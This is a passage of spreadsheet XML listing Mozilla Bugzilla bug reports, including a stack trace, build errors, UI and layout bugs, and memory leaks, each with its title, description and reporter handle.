[c:\build\chs3\build\mozilla\uriloader\base\nsdocloader.cpp @ 851]
51 docshell!nsDocLoader::DocLoaderIsEmpty(void)+0x6c (FPO: [Non-Fpo]) (CONV: 
thiscall) [c:\build\chs3\build\mozilla\uriloader\base\nsdocloader.cpp @ 743]
52 docshell!nsDocLoader::OnStopRequest(class nsIRequest * aRequest = 
0x13fc6aa8 class nsISupports * aCtxt = 0x00000000 unsigned int aStatus = 0)
+0x18b (FPO: [Non-Fpo]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\uriloader\base\nsdocloader.cpp @ 667]
53 necko!nsLoadGroup::RemoveRequest(class nsIRequest * request = 0x05e70214 
class nsISupports * ctxt = 0x00000000 unsigned int aStatus = 0)+0xb6 (FPO: 
[Non-Fpo]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\netwerk\base\src\nsloadgroup.cpp @ 732]
54 gklayout!nsDocument::UnblockOnload(void)+0x3d (FPO: [Non-Fpo]) (CONV: 
thiscall) [c:\build\chs3\build\mozilla\content\base\src\nsdocument.cpp @ 5118]
55 gklayout!DestroyImagePLEvent(struct PLEvent * aEvent = 0x778b0c24)+0x10 
(FPO: [100]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\content\base\src\nsimageloadingcontent.cpp @ 670]
56 xpcom_core!PL_DestroyEvent(struct PLEvent * self = 0x778b0c24)+0x2b (FPO: 
[100]) (CONV: cdecl) [c:\build\chs3\build\mozilla\xpcom\threads\plevent.c @ 
727]
57 xpcom_core!PL_HandleEvent(struct PLEvent * self = 0x778b0c24)+0x47 (FPO: 
[100]) (CONV: cdecl) [c:\build\chs3\build\mozilla\xpcom\threads\plevent.c @ 
699]
58 xpcom_core!PL_ProcessPendingEvents(struct PLEventQueue * self = 0x778b0c24)
+0x61 (FPO: [Uses EBP] [100]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\xpcom\threads\plevent.c @ 623]
59 xpcom_core!_md_TimerProc(struct HWND__ * hwnd = 0x77d49857 unsigned int 
uMsg = 0x1002bd8c unsigned int idEvent = 0xbaa03b0 unsigned long dwTime = 
0x113)+0x2d (FPO: [400]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\xpcom\threads\plevent.c @ 1013]
5a USER32!InternalCallWinProc+0x28
5b USER32!UserCallWinProc+0xf3 (FPO: [Non-Fpo])
5c USER32!DispatchMessageWorker+0x10e (FPO: [Non-Fpo])
5d USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
5e gkwidget!nsAppShell::Run(void)+0x10c (FPO: [Non-Fpo]) (CONV: stdcall) 
[c:\build\chs3\build\mozilla\widget\src\windows\nsappshell.cpp @ 159]
5f appcomps!nsAppStartup::Run(void)+0xd (FPO: [100]) (CONV: stdcall) 
[c:\build\chs3\build\mozilla\xpfe\components\startup\src\nsappstartup.cpp @ 208]
60 HsEngine!main1(int argc = 3 char ** argv = 0x002a4728 class nsISupports * 
nativeApp = 0x00000020)+0x355 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\build\chs3
\build\mozilla\xpfe\bootstrap\nsapprunner.cpp @ 1264]
61 HsEngine!main(int argc = 3 char ** argv = 0x002a4728)+0xc5 (FPO: [Non-Fpo]) 
(CONV: cdecl) [c:\build\chs3\build\mozilla\xpfe\bootstrap\nsapprunner.cpp @ 
1765]
62 HsEngine!WinMain(struct HINSTANCE__ * __formal = 0x7c816d4f struct 
HINSTANCE__ * __formal = 0x80000001 char * args = 
0x0853ee34 mponents/hsRecord.js int __formal = 0x7ffd4000)+0x18 (FPO: 
[400]) (CONV: stdcall) [c:\build\chs3
\build\mozilla\xpfe\bootstrap\nsapprunner.cpp @ 1789]
63 HsEngine!WinMainCRTStartup(void)+0x185 (FPO: [Non-Fpo]) (CONV: cdecl) 
[f:\vs70builds\3077\vc\crtbld\crt\src\crtexe.c @ 390]
64 kernel32!BaseProcessStart+0x23 (FPO: [Non-Fpo])</t>
  </si>
  <si>
    <t>TOOLKIT-254301</t>
  </si>
  <si>
    <t>Ctrl+* shortcuts don't work in the Find toolbar - of note Ctrl+V Ctrl+Backspace</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040725 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040725 Firefox/0.9
Ctrl+* shortcuts don't work in the Find toolbar since the Find field does not
have a cursor (but keyboard input gets directed to it). Clicking the field with
the mouse presents the user with a cursor after which all keyboard shortcuts
related to text entry work fine.
Reproducible: Always
Steps to Reproduce:
1. Start typing - the find toolbar appears
2. Try pasting text with Ctrl+V
Actual Results:  
No text gets pasted.
Expected Results:  
Text should get pasted since this is the default behaviour of a textfield. Also
other keyboard data entry shortcuts should work.</t>
  </si>
  <si>
    <t>jhatax</t>
  </si>
  <si>
    <t>CORE-391631</t>
  </si>
  <si>
    <t>Add docCharsetIsForced to nsIDOMWindowUtils</t>
  </si>
  <si>
    <t>Created attachment 276079
Patch
This is a spinoff of the core code from bug 382074 which I suspect is falling through the cracks of approval request triaging. The patch has r+sr=bz already.
It just adds a docCharsetIsForced attribute and associated getter to
nsIDOMWindowUtils and also resets the charset source of the document when
doing a document.open.
This is needed for bug 382074 which is blocking-firefox3+.</t>
  </si>
  <si>
    <t>CORE-7795</t>
  </si>
  <si>
    <t>exorcise nsIEnumerator in favor of nsISimpleEnumerator</t>
  </si>
  <si>
    <t>...or some other more scripable interface.
I've started on this crusade several times only to be chopped at the knees by
lethargy or some other overwhelming circumstance.</t>
  </si>
  <si>
    <t>erahm</t>
  </si>
  <si>
    <t>THUNDERBIRD-516586</t>
  </si>
  <si>
    <t>Account Settings dialog cuts off buttons needs to be wider</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 8.0 Windows NT 6.0 Trident/4.0 SLCC1 .NET CLR 2.0.50727 .NET CLR 3.0.30729 .NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1.4pre) Gecko/20090914 Shredder/3.0b4pre
Some of the buttons in the Account Settings dialogue are simply cut off by default.
Reproducible: Always
Steps to Reproduce:
1. Start TB.
2. Go to Tools / Account Settings.
3. Look at the Server Settings for instance.
Actual Results:  
One may see that some of the buttons and text does not fit into the window.</t>
  </si>
  <si>
    <t>brandt24</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-352127</t>
  </si>
  <si>
    <t>sl / Slovene</t>
  </si>
  <si>
    <t>[sl] Ship Firefox 2</t>
  </si>
  <si>
    <t>aleksr_si</t>
  </si>
  <si>
    <t>THUNDERBIRD-289454</t>
  </si>
  <si>
    <t>Group-by Sort headers are targets for next message</t>
  </si>
  <si>
    <t>When a new message arrives it gets sorted into one of the group-by sections
(e.g. Today. If you are in for example Yesterday and you hit N
Thunderbird uselessly advances to the group label not showing any new message.
A second N causes an advance to the desired message.
Thunderbird build: 20050315
Expected result: TB should advance to the next actual new message and display it
without stopping at the label.</t>
  </si>
  <si>
    <t>hacksoncode</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-160878</t>
  </si>
  <si>
    <t>totalnfs.net - background color is not set</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.0.0) Gecko/20020530
BuildID:    2002053012
On this page in the main frame the background color should be blue and the text
color white. But i get a white background with white text so it's not possible
to read something. In IE6 the background is blue.
Reproducible: Always
Steps to Reproduce:
1. goto the above link
Actual Results:  Background color is white
Expected Results:  Background color should be blue</t>
  </si>
  <si>
    <t>etreise</t>
  </si>
  <si>
    <t>NSS-125611</t>
  </si>
  <si>
    <t>Crash in PK11_FindCertFromNickname</t>
  </si>
  <si>
    <t>Calling PK11_FindCertFromNickname with a valid :
string will cause a crash if the token is not inserted.  Patch coming soon.</t>
  </si>
  <si>
    <t>javi</t>
  </si>
  <si>
    <t>SEAMONKEY-145580</t>
  </si>
  <si>
    <t>JS errors in mailWindowOverlay.js for newgroups only configuration</t>
  </si>
  <si>
    <t>Steps to reproduce:
1.start mozilla
2.ctrl-2 to start Mail &amp; Newsgroups
3.alt-f to open the File menu
Result: 
Error: server has no properties
Line: 1366 and 1371 in mailWindowOverlay.js
Expected result: no errors</t>
  </si>
  <si>
    <t>bugs4hj</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-433874</t>
  </si>
  <si>
    <t>mozilla-central tinderbox logs don't show commands that are being executed</t>
  </si>
  <si>
    <t>This kind of sucks. For one it makes it really hard to determine some things like if we built a PGO build. It also means I can't search the log for 'buildsymbols' to find the breakpad symbol store build.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-338823</t>
  </si>
  <si>
    <t>Validate instance documents on xforms-rebuild</t>
  </si>
  <si>
    <t>Right now we only call ValidateDocument() on all instance documents on form load. Should we not be doing it for xforms-rebuild too?
If not any new inserted nodes will not have the correct type set I guess.</t>
  </si>
  <si>
    <t>NSS-399681</t>
  </si>
  <si>
    <t>Failures to upgrade legacy DB to shared DB go unreported in results.html</t>
  </si>
  <si>
    <t>Bob Slavo
While porting NSS to 64-bit windows and running all.sh I experienced crashes in certutil when doing the database upgrade every single time (legacy to shared library update tests).
I went into the debugger to investigate. I ended up killing the debugger.
All these tests in results.html were green (passed).
This is a scripting problem that needs to be fixed. Right now these tests are worse than useless since they are always reported as passing even when they fail in the worst way by crashing.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-156786</t>
  </si>
  <si>
    <t>Embedding: Mac</t>
  </si>
  <si>
    <t>Referrer not set when opening links in new window</t>
  </si>
  <si>
    <t>- go to above page (caution it's pr0n and may even disappear w/in a few days)
- use context menu to open any of the thumbnails in a new window
expected:
image appears in new window
actual:
because the referrer is not set the webserver redirects you to a not found page.
this is the equiv of bug 156732 but for PPEmbed.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-520839</t>
  </si>
  <si>
    <t>[meta] Bugs on product site changes for 2.0</t>
  </si>
  <si>
    <t>We have a number of bugs filed by various people on changes to the website that should happen only with the 2.0 site content refresh.  Rather than following them all individually we should just keep track of them via this bug.</t>
  </si>
  <si>
    <t>SEAMONKEY-203956</t>
  </si>
  <si>
    <t>Mac static build is broken</t>
  </si>
  <si>
    <t>ssu's checkin for bug 125106 broke the Mac static build.  Here's the error:
c++  -fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith -Wcast-align
-Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-long-long
-fpascal-strings -traditional-cpp -fno-common -fshort-wchar
-I/Developer/Headers/FlatCarbon -F/System/Library/Frameworks -pipe  -DNDEBUG
-DTRIMMED -O -fPIC -arch ppc -o libxpinstall.dylib  CertReader.o nsInstall.o
nsInstallTrigger.o nsInstallVersion.o nsInstallFolder.o nsJSInstall.o nsJSFile.o
nsJSInstallTriggerGlobal.o nsJSInstallVersion.o nsSoftwareUpdate.o
nsSoftwareUpdateRun.o nsInstallFile.o nsInstallExecute.o nsInstallPatch.o
nsInstallUninstall.o nsInstallResources.o nsRegisterItem.o
nsTopProgressNotifier.o nsLoggingProgressNotifier.o ScheduledTasks.o
nsXPIProxy.o nsXPITriggerInfo.o nsXPInstallManager.o nsInstallFileOpItem.o
nsJSFileSpecObj.o nsInstallLogComment.o nsInstallBitwise.o      
-L../../dist/bin -L../../dist/lib  -L../../dist/bin -lmozjs -L../../dist/bin
-lxpcom -L../../dist/bin -L/builds/tinderbox/SeaMonkey/Darwin_!
 6.5_Depend/
mozilla/dist/lib -lplds4 -lplc4 -lnspr4 -lpthread  -L../../dist/lib
-lxpcom_compat ../../dist/lib/libunicharutil_s.a -lz   -framework Carbon
/System/Library/Frameworks/Carbon.framework/Carbon  -bundle -lm    
ld: ../../dist/lib/libunicharutil_s.a(nsUnicharUtils.o) has local relocation
entries in non-writable section (__TEXT__text)
make[4]: *** [libxpinstall.dylib] Error 1
The problem is that libunicharutil_s.a has been built with non-position
independent code.  But xpinstall is forced to be a shared library so it needs
to use PIC if xpinstall is enabled.</t>
  </si>
  <si>
    <t>SEAMONKEY-166600</t>
  </si>
  <si>
    <t>browser will not start up</t>
  </si>
  <si>
    <t>molbio2% /usr/local/mozilla/dist/bin/mozilla
INTERNAL ERROR on Browser End: No manager for initializing factory?
System error?:: Error 0
I got this error  downloaded mozilla-1.1b built with SUNWspro and got this
error still</t>
  </si>
  <si>
    <t>BUGZILLA-316665</t>
  </si>
  <si>
    <t>Make Bugzilla work with FastCGI</t>
  </si>
  <si>
    <t>FastCGIÂ  is a language independent scalable open extension  to CGI that provides high performance without the limitations of server specific APIs. -- from the fastcgi.com web site.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-469531</t>
  </si>
  <si>
    <t>Can't access AMO logs from khan</t>
  </si>
  <si>
    <t>/mnt/netapp/nfs/stats/logs/im-log01/addons.mozilla.org is empty as is /mnt/netapp/nfs/stats/logs/im-log02/</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-990722</t>
  </si>
  <si>
    <t>please loan jmaher an ec2 machine equal to a linux32-spot instance</t>
  </si>
  <si>
    <t>I need to debug a leak on linux debug bc2 so we can complete the mochitest-dt migration.</t>
  </si>
  <si>
    <t>jmaher</t>
  </si>
  <si>
    <t>CORE-338247</t>
  </si>
  <si>
    <t>m:\builds\vc8debug\dist\include\content\nsContentUtils.h(220) : warning C4554: ' use parentheses to clarify precedence</t>
  </si>
  <si>
    <t>/**
   * Returns true if aNode1 is before aNode2 in the same connected
   * tree.
   */
  static PRBool PositionIsBefore(nsINode* aNode1
                                 nsINode* aNode2)
  {
    return ComparePosition(aNode1 aNode2) &amp;
      (nsIDOM3Node::DOCUMENT_POSITION_PRECEDING |
       nsIDOM3Node::DOCUMENT_POSITION_DISCONNECTED) ==
      nsIDOM3Node::DOCUMENT_POSITION_PRECEDING
  }
Building SeaMonkey trunk on WinXP MSVC8 keeps spewing this build warning.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-412847</t>
  </si>
  <si>
    <t>Need to find MDC's images for Deki migration</t>
  </si>
  <si>
    <t>Who knows where the images uploaded into the MDC wiki are stored?  I need to get a zip archive of them delivered to the Mindtouch guys for the Deki Wiki conversion before I go on my two-week leave after tomorrow.</t>
  </si>
  <si>
    <t>CORE-344883</t>
  </si>
  <si>
    <t>print previewing url freezes bon echo (and minefield if you zoom too)</t>
  </si>
  <si>
    <t>Print previewing the url above consistently freezes Bon Echo at the Preparing stage.
Note that the url above is actually an article on how to embed images at higher resolution than normal so they print at high quality. Clearly this less usual technique might be something to do with the problem but if so it's embarassing to crash as a result of a technique recommended on a high-profile web-design site.
I can also consistently freeze Minefield though that takes more steps and could actually be a different problem:
  1. Visit above url
  2. Enter print preview (so far so good)
  3. Change scale factor to 800% (you have to use custom and yes I realise this is a bit of an edge case but it works fine for 400% say)
  *  Minefield freezes (again at the Preparing stage)
The two UAs are 
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1b1) Gecko/20060714 BonEcho/2.0b1
and
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060714 Minefield/3.0a1
respectively.</t>
  </si>
  <si>
    <t>moz.jomel</t>
  </si>
  <si>
    <t>FIREFOX-389302</t>
  </si>
  <si>
    <t>When java not installed then window.java should be undefined instead of an object</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
When Java is not installed on my system the javascript window.java returns an object instead of being undefined.
Also window.java.lang is an object when it should be undefined.
This issue occurs for Firefox 1.5+ on WinXP.
The danger here is that if you then access window.java.lang.System then the javascript interpretor will crash.
In Firefox 1.0 window.java is undefined as expected.
This bug is related to bug # 347587
Reproducible: Always
Steps to Reproduce:
1. Uninstall java
2. Have a javascript in your web page that prints out the value of typeof window.java
3.
Actual Results:  
window.java returns an object even though java is not installed
Expected Results:  
window.java should be undefined</t>
  </si>
  <si>
    <t>gerds21</t>
  </si>
  <si>
    <t>CORE-210451</t>
  </si>
  <si>
    <t>Implement Node.textContent</t>
  </si>
  <si>
    <t>So Johnny and I were talking about this earlier and here's the result.
Also since DOM Core Level 3 is in last call I added the remaining stuff in the
spec to nsIDOM3Node.</t>
  </si>
  <si>
    <t>CORE-227705</t>
  </si>
  <si>
    <t>Accessing *state-&gt;cpend in jsregexp.c</t>
  </si>
  <si>
    <t>The lines 483-485 in jsregexp.c contain:
                if ((state-&gt;cp cpend) &amp;&amp; (*state-&gt;cp == '?')
                        &amp;&amp; ( (state-&gt;cp[1] == '=')
                                || (state-&gt;cp[1] == '!')
                                || (state-&gt;cp[1] == ':') )) {
which would access a character at state-&gt;cpend for regexp like /(?/. AFAIK since
all char arrays are 0-terminated it does not cause any problems but it still I
guess violates recommended practice.
In addition the line 488 contains useless check against state-&gt;cpend which
always passes since the initial if guaranties that at that point (state-&gt;cp &lt;
state-&gt;cpend)</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-273524</t>
  </si>
  <si>
    <t>Helper applications with parameters don't work ( GTK2/Gnome )</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-GB rv:1.7.5) Gecko/20041110 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-GB rv:1.7.5) Gecko/20041110 Firefox/1.0
I have compiled the firefox with GTK2 (--enable-default-toolkit=gtk2). When I
download any download any application from Internet It is not populating the
default handler properly whatever I have associated in GNOME.
Reproducible: Always
Steps to Reproduce:
1. Associate a .txt file in gnome with gedit but with a parameter --new-window 
   'gedit --new-window'. By make the default action as custom and 'Program to
Run' gedit --new-window
2. Now in the firefox try to download a file with .txt extension then the file
handler will not come.
Actual Results:  
file handler list will be empty
Expected Results:  
it should come what ever we have associated in GNOME.</t>
  </si>
  <si>
    <t>rsubbu</t>
  </si>
  <si>
    <t>CORE-307989</t>
  </si>
  <si>
    <t>Crash [@ GetWrapperFor] [@ nsIView::GetViewFor] dragging selection within evil changing document</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20050910
Firefox/1.6a1
Steps to reproduce:
1. Open the very evil testcase.
2. Select some text and start dragging it. (You can use the keyboard to select
all before dragging with the mouse.)
3. Wait until the page changes.
4. Drop.
Result: More often than not the browser crashes [@ nsIView::GetViewFor] [@
GetWrapperFor].  The top of the stack is a random address.  I'm pretty sure this
is exploitable.
TB9234593K TB9234571Z
Please keep this security-sensitive until a Firefox release with this fix has
gone out and both bug 306663 and bug 306939 have become public.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-481615</t>
  </si>
  <si>
    <t>The Fennec repack builder isn't picking up changes to en-us files</t>
  </si>
  <si>
    <t>The Fennec repack builder isn't picking up changes in mobile-browser/locales/en-US
Pike on IRC: essentially it's not even asking that repo for changes</t>
  </si>
  <si>
    <t>SEAMONKEY-475889</t>
  </si>
  <si>
    <t>${BrandFullName} needs to be quoted in shared.nsh</t>
  </si>
  <si>
    <t>Created attachment 359471
patch
spinoff of bug 475885 for SeaMonkey</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-484735</t>
  </si>
  <si>
    <t>Website:Frequent questions tab looks wider than other tabs in IE7</t>
  </si>
  <si>
    <t>Created attachment 368841
FAQ tab
Browser:IE7.0.573
Steps to reproduce:
1.Go to https://sm-weave-proxy01.services.mozilla.com/store/faq.html in IE7
2.Notice the header tabs
expected result:
All tabs are of the same width
actual result:
Frequent questions tab looks wider than other tabs in IE7
additional info:
tabs look ok in firefox 3</t>
  </si>
  <si>
    <t>krupa.mozbugs</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-417312</t>
  </si>
  <si>
    <t>Web Services</t>
  </si>
  <si>
    <t>webservices build broken</t>
  </si>
  <si>
    <t>bug 397929 introduced GetMessageMoz in nsIException so we need to make changes to reflect that.  Also as a follow up to that bug reed had added GetMessageMoz to nsSOAPMessage but that isn't really needed according to bsmedberg.</t>
  </si>
  <si>
    <t>BUGZILLA-170822</t>
  </si>
  <si>
    <t>Linkification process destroys whitespace</t>
  </si>
  <si>
    <t>Currently the linkification process destroys whitespace - it's preserved but
the output template doesn't use  tags and so the browser collapses it.
We should use  tags and make it more obvious what's going on on the page.
Gerv</t>
  </si>
  <si>
    <t>CORE-215163</t>
  </si>
  <si>
    <t>nsComposerCommandsUpdater leaks due to incorrect timer usage</t>
  </si>
  <si>
    <t>Due to the patch in bug 207469 nsComposerCommandsUpdater leaks.
Steps to reproduce:
 1. setenv XPCOM_MEM_LEAK_LOG leak.log
 2. Run ./mozilla -editor
 3. Type a few characters
 4. Close the window with the X in the corner.
 5. Click Don't Save.
Actual results:
 nsComposerCommandsUpdater object leaked (and perhaps a bunch of others because
of it)
This is caused by the patch in bug 207469.  Each time InitWithCallback is
called it |AddRefs| the timer callback implementor (the
nsComposerCommandsUpdater) but the callback is only released in the timer's
destructor.
(Maybe the timer API should be better?)</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-745594</t>
  </si>
  <si>
    <t>[el] Translate strings for variants of the upgrade dialog for 3.6 users'</t>
  </si>
  <si>
    <t>This is a tracking bug to follow the translation of a few extra strings in upgradedialog.lang that show variants of the unsupported message billboard to 3.x users.
Here are the urls of the billboards:
http://www-dev.allizom.org/b/el/firefox/unsupported/warning/
http://www-dev.allizom.org/b/el/firefox/unsupported/EOL/
http://www-dev.allizom.org/b/el/firefox/unsupported/win2k/
http://www-dev.allizom.org/b/el/firefox/unsupported/winxp/
You may already have partly or completely translated the strings since several f thel were already translated last year for previous versions of the billboard and the last ones where added last week on your web dashboard as untranslated (but the pages were not built and we didn't have the staging server ready until this week end to check these strings in context in real pages).
If you have already translated the strings just mark this bug as fixed other wise please update your upgradedialog.lang file on mozilla.org:
http://l10n.mozilla-community.org/~pascalc/langchecker/?locale=el#upgradedialog.lang
source:
https://svn.mozilla.org/projects/mozilla.com/trunk/locales/el/upgradedialog.lang
Thanks</t>
  </si>
  <si>
    <t>CALENDAR-265515</t>
  </si>
  <si>
    <t>too many all-day events on one day mess up week view</t>
  </si>
  <si>
    <t>When there are too many all-day events on one day all the stars in the
week-view are still one one line making the column way too wide. A result is
that the event boxes aren't aligned anymore.</t>
  </si>
  <si>
    <t>FIREFOX-352768</t>
  </si>
  <si>
    <t>searchForm isn't parsed for Sherlock engines</t>
  </si>
  <si>
    <t>I'm not sure how I missed this the patch is dead simple and introduces no risk.</t>
  </si>
  <si>
    <t>CORE-127123</t>
  </si>
  <si>
    <t xml:space="preserve"> delimiter doesn't work as expected</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 Galeon/1.0.3 (X11 Linux i586 U) Gecko/20020211
BuildID:    2002021422
Problem is short:
write down such testing file:
testing plaintext problem
some text
plaintext  lines
  of text data
normal text below plaintext in the same paragraph
normal text below plaintext
normal text in paragraph
1. Problem is that text inside the same paragraph ()
as  after  is also rendered using
font setting as for plaintext above !
almost as if it were INSIDE  tag.
2. It can be even worse because if You use 
NOT iside paragraph  (remove items marked remove for test)
all below content of html file will be rendered this way.
If sth. was not clear - contact me.
HTH
Reproducible: Always
Steps to Reproduce:
just use file content I wrote above</t>
  </si>
  <si>
    <t>CORE-87965</t>
  </si>
  <si>
    <t>Networking: JAR</t>
  </si>
  <si>
    <t>Can't expand chrome/*.jar files on ARM</t>
  </si>
  <si>
    <t>If you build Mozilla for ARM and run it on ARM nsZipArchive::BuildFileList()
fails on expanding chrome/*.jar files.
Size of ZipEnd in zipstruct.h becomes 24. But it should be 22.</t>
  </si>
  <si>
    <t>kazhik</t>
  </si>
  <si>
    <t>CORE-481024</t>
  </si>
  <si>
    <t>[FIX]Textarea does not respect box model when max-width or max-height is applied to it</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
If a textarea has a specified max-width or max-height it will no longer respect the box model. Instead the borders and the padding will also be counted in the width. This only happens in Firefox. IE Opera Chrome and Safari still respect the box model.
Reproducible: Always
Steps to Reproduce:
1.Create a textarea and give it a width say 400px with borders say 4px wide and padding say 10px.
2.Create an identical textarea under the first one give it a max-width of 400px
Actual Results:  
The second textarea is 28px narrower than the first one because the borders and padding are now counted in the width. The first textarea is 400px+8px+20px. The second one is 400px.
Expected Results:  
The second textarea should have the same width as the first one 428px. It should still respect the box model.
I noticed this happens with any doctype and on any machine using any version of Mozilla Firefox (I used browsershots.org). Using -moz-box-sizing: content-box does not help. Using border-box or padding-box makes things even worse. Specifying a value for rows or cols doesn't change anything. Also I have only noticed this for textareas div containers for example will respect the box model fine with a specified max-width or max-height value. I haven't tried other elements like input.
This is important because many users might want to give a textarea a max-width and/or a max-height value in order to prevent browsers like Safari and Chrome from resizing the textarea. Since none of the other browsers have a problem with the box model this is bad for the design as the textarea will look different in Firefox.</t>
  </si>
  <si>
    <t>eddypro</t>
  </si>
  <si>
    <t>BUGZILLA-243351</t>
  </si>
  <si>
    <t>case-sensitive summary matching breaks MySQL &lt; 4.0.2</t>
  </si>
  <si>
    <t>The checkin from bug 225075 inadvertantly bumped the MySQL requirements to 4.0.2.
Our previous minimum version was 3.23.41.
We need to either:
1) Back out the patch from bug 225075
2) Find another way to fix that bug
3) Change checksetup.pl to require MySQL 4.0.2 or later</t>
  </si>
  <si>
    <t>CORE-28817</t>
  </si>
  <si>
    <t>Solaris/Intel/WS5.0: missing xptcinvoke_asm_x86_soalris.s</t>
  </si>
  <si>
    <t>xptcinvoke_asm_x86_soalris.s is missing
xptcstubs_asm_X86_solaris.s is missing
Can you just use ansi c for this functionality???
I use a sun workshop compiler 5.0 for X86 and
dont have a clue how to manipulate the program
stack as you do with gcc.
Would it not carry you a lot further in to
find a good way of producing this code in ansi C.
I applaud the cleverness of the writers on makeing this code
only were does it leave the rest of us not so bright ones.
Even if you know its slower if it at least works thats all anyone
would ask.
Thanks for your kind attention</t>
  </si>
  <si>
    <t>amarzec</t>
  </si>
  <si>
    <t>CORE-360847</t>
  </si>
  <si>
    <t>Remove unused nsIDOM*foo*Listener interfaces</t>
  </si>
  <si>
    <t>We could perhaps clean up / remove some DOM Events related interface already in 1.9.
See also http://wiki.mozilla.org/Gecko:Obsolete_API</t>
  </si>
  <si>
    <t>BUGZILLA-237435</t>
  </si>
  <si>
    <t>h1 |Edit Attachment #129471 for Bugs 215587| uses the wrong Terms</t>
  </si>
  <si>
    <t>steps:
1. edit an attachment
2. read the heading
2' carp
why?
 25 [% title = BLOCK %]Edit Attachment #[% attachid %] for [% terms.Bug %] #[% 
bugid %][% END %]
 26 [% h1 = BLOCK %]Edit Attachment #[% attachid %] for
 27   [%+ GetBugLink(bugid $terms.Bugs $bugid) %][% END %]
The title uses terms.Bug but the heading two lines later uses something else 
entirely.</t>
  </si>
  <si>
    <t>CORE-482013</t>
  </si>
  <si>
    <t>use role.js instead of explicit .role and .finalRole calls</t>
  </si>
  <si>
    <t>Created attachment 366085
patch</t>
  </si>
  <si>
    <t>CORE-385862</t>
  </si>
  <si>
    <t>View usage cleanups</t>
  </si>
  <si>
    <t>Created attachment 269793
Patch
Removes some useless code.  Note that both InsertZPlaceholder and SetViewCheckChildEvents don't do anything useful in the current codebase: SetViewCheckChildEvents sets a flag which is never checked and InsertZPlaceholder creates nsZPlaceholderViews which we don't use for anything since frame display lists landed.  (I have a patch to remove them but it's mixed up with a bunch of other stuff so I figured I'd post this separately first rather than throw all 1500 lines at you at once.)</t>
  </si>
  <si>
    <t>SEAMONKEY-80625</t>
  </si>
  <si>
    <t>Please implement --disable-postscript</t>
  </si>
  <si>
    <t>[based on discussion on IRC #mozilla]
RFE: Please implement a configure switch to disable the build of the
PostScript module on Unix/Linux platforms (suggested configure switch name
--disable-postscript).
The native PostScript module isn't needed on platforms where Xprint
client-library(libXp)+server(Xprt) are available - why wasting space in the
distribution archive with a _large_ module (~~0.7MB!?) when Xprint supersets
it's functionality (faster smaller footprint full i18n support) with half the
module size !?</t>
  </si>
  <si>
    <t>FIREFOX-256452</t>
  </si>
  <si>
    <t>Redirection Limit exceeded-Error when trying to load a page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
If you click the community-Button on http://www.famile.de the alert
Redirection-Limit for this URL exceeded. Unable to load the requested page.
This may be caused by cookies that are blocked. shows up.
I don't block any Cookies.
When you change the User-Agent-String into MSIE the link works.
Reproducible: Always
Steps to Reproduce:
1. Visit http://www.familie.de
2. Click on Community (left Frame)
Actual Results:  
The alert Redirection-Limit for this URL exceeded. Unable to load the requested
page. This may be caused by cookies that are blocked. appears
Expected Results:  
There should be no error-message the page should load.</t>
  </si>
  <si>
    <t>s.schmied</t>
  </si>
  <si>
    <t>FIREFOX-334697</t>
  </si>
  <si>
    <t>Implement pie-chart throbber</t>
  </si>
  <si>
    <t>Visual indication of page load progress is currently split across two locations in the browser. The throbber indicates that some type of network loading is going on and the horizontal progress bar gives a SWAG of the overall progress of that load. 
